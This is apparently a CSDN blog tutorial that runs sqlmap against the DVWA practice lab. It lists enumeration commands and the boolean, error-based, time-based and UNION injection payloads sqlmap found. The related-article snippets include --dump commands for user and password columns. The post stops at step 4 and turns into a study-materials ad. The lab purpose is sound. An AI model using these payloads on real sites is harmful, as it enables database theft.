【渗透测试】 sqlmap工具注入-基于dvwa的sql injection_dvwa sql注入 sqlmap

于 2024-05-13 10:41:08 发布
阅读量880 收藏 14
点赞数 28
分类专栏: 程序员 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84968269/article/details/138792404
版权

1、获取sql漏洞相关信息
命令:

sqlmap -u "http://192.xxx.xxx.xxx/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=uq38d1l9sa" --batch

-u 指定目标url
--cookie  指定http cookie
--batch 使用所有默认配置,不询问用户输入,自动应答

结果:
在这里插入图片描述

这些是SQLMap的检测结果,用于检测DVWA中的初级SQL注入漏洞。让我逐一解释每个结果,并举例说明:

  1. Type: boolean-based blind
    这个检测结果表明系统对注入的布尔型(Boolean)条件的回显处理方式存在漏洞,可以通过布尔型盲注(Boolean-based blind injection)进行攻击。攻击者可以通过构造布尔条件来判断数据库的真假情况,从而逐步推断出数据库中的数据。
    举例:id=1' OR NOT 1068=1068#&Submit=Submit
    这个payload试图在id参数中注入一个布尔型条件,通过OR操作符将一个永远为真的条件添加到原始查询中,从而使整个条件为真,进而导致系统执行了攻击者构造的恶意查询。
  2. Type: error-based
    这个检测结果表明系统对错误消息的处理方式存在漏洞,可以通过错误消息来推断数据库的结构或内容,从而进行注入攻击。攻击者通常会利用数据库错误消息中的信息来获取敏感数据或执行恶意操作。
    举例:id=1' AND (SELECT 1021 FROM(SELECT COUNT(*),CONCAT(0x7176766b71,(SELECT (ELT(1021=1021,1))),0x71626a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- qRJd&Submit=Submit
    这个payload尝试通过在查询中嵌入一个错误,然后通过错误消息中的内容来获取敏感信息或执行其他恶意操作。
  3. Type: time-based blind
    这个检测结果表明系统对时间延迟的处理方式存在漏洞,可以通过时间延迟来推断数据库的真假情况,从而进行注入攻击。攻击者通常会利用时间延迟来逐步获取数据库中的数据。
    举例:id=1' AND (SELECT 7410 FROM (SELECT(SLEEP(5)))EbOw)-- SUsz&Submit=Submit
    这个payload试图通过在查询中嵌入一个时间延迟函数来验证注入点的存在,如果系统在执行这个查询时发生了延迟,那么说明注入点存在,攻击者可以进一步利用这个注入点执行其他操作。
  4. Type: UNION query
    这个检测结果表明系统对联合查询的处理方式存在漏洞,可以通过联合查询来获取额外的信息或执行其他操作。攻击者通常会通过联合查询来合并原始查询和恶意查询的结果,从而获取敏感信息或执行其他恶意操作。
    举例:id=1' UNION ALL SELECT CONCAT(0x7176766b71,0x6c737579624a6b61714e664c7177594f4870627173724e5a65686e4851706870657a4d747a555447,0x71626a7a71),NULL#&Submit=Submit
    这个payload试图通过联合查询来将恶意结果合并到原始查询结果中,以获取更多信息或执行其他恶意操作。

这些例子展示了SQL注入漏洞可能带来的不同攻击方式,攻击者可以利用这些漏洞来获取敏感信息、执行恶意操作或者破坏系统的安全性。

2、获取数据库名:
命令:

sqlmap -u "http://192.xx.x.x/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=uq38d1l9sa" --dbs --batch

--dbs 枚举dmbs数据库中所有的数据库

结果:
在这里插入图片描述
3、获取数据库表名
命令:

sqlmap -u "http://192.x.x.x/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=uq38d1l9sa" -D dvwa --tables --batch

-D DB 指定数据库后进行枚举
--tables 枚举DMBS数据库中所有数据表

结果:
在这里插入图片描述
4、获取字段名
命令:

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

/bbs.csdn.net/topics/618653875)

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84968269
关注
  • 28
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap在windows上执行sql注入,利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
sqlmap的常用命令和对dvwa的初,中级sql注入测试
G17653692793的博客
05-03 1289
sqlmap -u "[目标注入点]" --data "[request]" --cookie="[站点cookie]" -D dvwa -Tusers -C user,password --dump。sqlmap -u "[目标注入点]" --cookie="[站点cookie]" -D dvwa -T users -C user,password --dump。sqlmap -u "[目标注入点]" --cookie="[站点cookie]" -D dvwa -T users --dump。
Sqlmap
mumuzi2的博客
02-25 387
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
SQL注入DVWA靶场搭建及使用、sqlMap注入sqlmap问题及解决办法)
tmzy1的博客
03-19 5856
SQL注入DVWA靶场搭建及使用、sqlMap注入sqlmap问题及解决办法)
自学渗透测试:使用 DVWASQLmap 探寻 SQL 注入攻击与防范
weixin_43263566的博客
01-04 2557
SQL注入漏洞
DVWA之暴力破解二(手动注入和使用sqlmap
cai_huaer的博客
04-19 901
因为之前我们是登录进来,所以有一个cookie,现在我们之间用url去请求,没有附带cookie,所以这时是需要重新回到登录页面的。再回到之前的源代码那,可以看到,密码是md5加密后再存的,所以在网上搜索md5解密,把爆破出来的密码成功还原。然后我们分析,user变量是用单引号‘去识别的,那我们在输入的时候,自己加入’后再加入一些其他的内容是不是也可以。后台数据库是MySQL,然后有两个数据库,一个是information_schema,一个是dvwa。3.接着,我们继续注入,爆破所有的数据库
DVWA靶场-SQL Injection(难度低、中、高)-sqlmap自动化漏洞扫描
weixin_43850721的博客
12-14 2767
此处使用docker容器搭建靶场。使用docker平台即可实现靶场的快速搭建,比较方便。使用docker搜索dvwa镜像:docker search dvwa。此处选择第一个镜像文件下载:docker pull citizenstig/dvwa。下载完毕后,可以使用docker images来查看所有的镜像,从中可以找到dvwa
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
1. SQLMapSQLMap 是一个开源的 SQL 注入检测工具,可以自动检测 SQL 注入漏洞。 2. Burp Suite:Burp Suite 是一个 Web 应用安全检测工具,包含 SQL 注入检测功能。 六、总结 SQL 注入是一种常见的 Web 应用安全...
使用sqlmap+burpsuite进行中级sql注入
06-01
本篇将详细介绍如何结合sqlmap和BurpSuite工具进行中级SQL注入的实战操作。 首先,我们需要了解sqlmap和BurpSuite的基本功能。sqlmap是一款自动化SQL注入工具,它能自动检测和利用SQL注入漏洞,获取数据库信息。...
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
1. sqlmap是一款强大的自动化SQL注入工具,它可以自动识别SQL注入漏洞并利用它们。在本实验中,我们将用sqlmapDVWA(Damn Vulnerable Web Application)靶场进行测试。 2. 首先,我们需要获取靶机上的数据库信息...
学习之sql注入漏洞网址的创建
06-06
其次,`sqlmap`是一个自动化工具,用于检测和利用SQL注入漏洞。它能自动识别注入点,进行数据提取、数据库枚举、获取数据库管理权限等操作。在我们的学习环境中,sqlmap可以用来验证我们创建的URL是否真正存在SQL...
一起学安全测试——用sqlmapdvwa实现SQL注入测试
热门推荐
灰蓝
03-29 1万+
sqlmap是一款进行SQL注入工具,非常简单好用。我们在dvwa上试着用sqlmap实现注入,拿到数据库的信息。搭建dvwa环境并启动。 windows上需要搭建Python环境,下载sqlmap包并解压。kali linux自带(之后演示在kali上)。 设置dvwa级别为low(medium,high都可以,不要设成impossible就行) 打开dvwaSQL Injection,打开浏
渗透测试】|sqlmap工具注入-基于dvwasql injection
yangdan_jiayou的博客
03-27 636
这个检测结果表明系统对联合查询的处理方式存在漏洞,可以通过联合查询来获取额外的信息或执行其他操作。这个检测结果表明系统对错误消息的处理方式存在漏洞,可以通过错误消息来推断数据库的结构或内容,从而进行注入攻击。这个payload试图通过在查询中嵌入一个时间延迟函数来验证注入点的存在,如果系统在执行这个查询时发生了延迟,那么说明注入点存在,攻击者可以进一步利用这个注入点执行其他操作。这个payload尝试通过在查询中嵌入一个错误,然后通过错误消息中的内容来获取敏感信息或执行其他恶意操作。
DVWA通过攻略之SQL注入
勿山几已
05-24 8550
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
DVWA靶场通关记录(SQL注入)
weixin_73557450的博客
05-13 1004
在MySQL中,自带的库为information_schema,其中包含MySQL中所有的数据库信息,包括所有库名、表名和列名。可以通过这个自带库获取信息。其中的表tables存储表名,表columns存储列名,通过句点“.”来连接上下级关系,例如:information_schema.tables。使用database()语句可以查询当前所在的数据库名称,user()可以查询当前登录的用户名。
DVWA——SQL注入+盲注
qq_58553228的博客
06-02 1178
目的:执行特定sql语句,获得其他相关内容。攻击方式:动态构造SQL语句影响:数据库的脱裤、修改、甚至影响到操作系统。
sqlmap自动化漏洞利用(DVWA初、中、高)
qq_42620328的博客
10-14 7060
sqlmap自动化漏洞利用(DVWA
DVWA靶场 -如何使用sqlmap 工具get注入
xiaojiadong2019的博客
10-19 471
SQL注入是将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。如Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证(即存在注入点)就直接传输给数据库,就可能导致拼接的SQL被执行,获取对数据库的信息以及提权,发生SQL注入攻击。注入点初步测试,输入框输入单引号'出现报错,可以看出该输入框存在注入点,且数据库是MySQL数据库。2、通过注入点,尝试获取数据库相关基本信息。2、使用Sqlmap工具测试。
sqlmapdvwa
最新发布
06-14
SQLMap是一个著名的开源工具,用于自动化SQL注入攻击检测和利用。DVWA(Damn Vulnerable Web Application)是一个非常受欢迎的网络安全教育工具,设计用来演示各种常见的Web应用程序漏洞,包括SQL注入。 当你使用SQLMapDVWA进行渗透测试时,你可以执行以下几个步骤: 1. **下载并安装**:首先,你需要从SQLMap的官方GitHub仓库下载最新版本,并按照指示安装在你的测试环境中。 2. **目标设置**:连接到DVWA的服务器,通常它运行在本地或通过虚拟主机,然后确定目标URL以及你想要注入的页面,如登录、注册等有SQL查询的地方。 3. **SQL注入测试**:使用SQLMap的`-u`参数指定URL,然后执行`-D`选项以探测数据库类型,`-T`选项选择表名,`-t`选择测试字段,SQLMap会尝试识别和利用可能的SQL注入点。 4. **数据获取**:利用找到的漏洞,你可以获取数据库中的敏感信息,比如用户名和密码,或者执行未授权的操作,如修改数据。 5. **学习和防御**:这个过程有助于理解实际的攻击原理,并学习如何在代码层面修复这些漏洞,例如使用预编译语句、参数化查询等方法来防止SQL注入
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值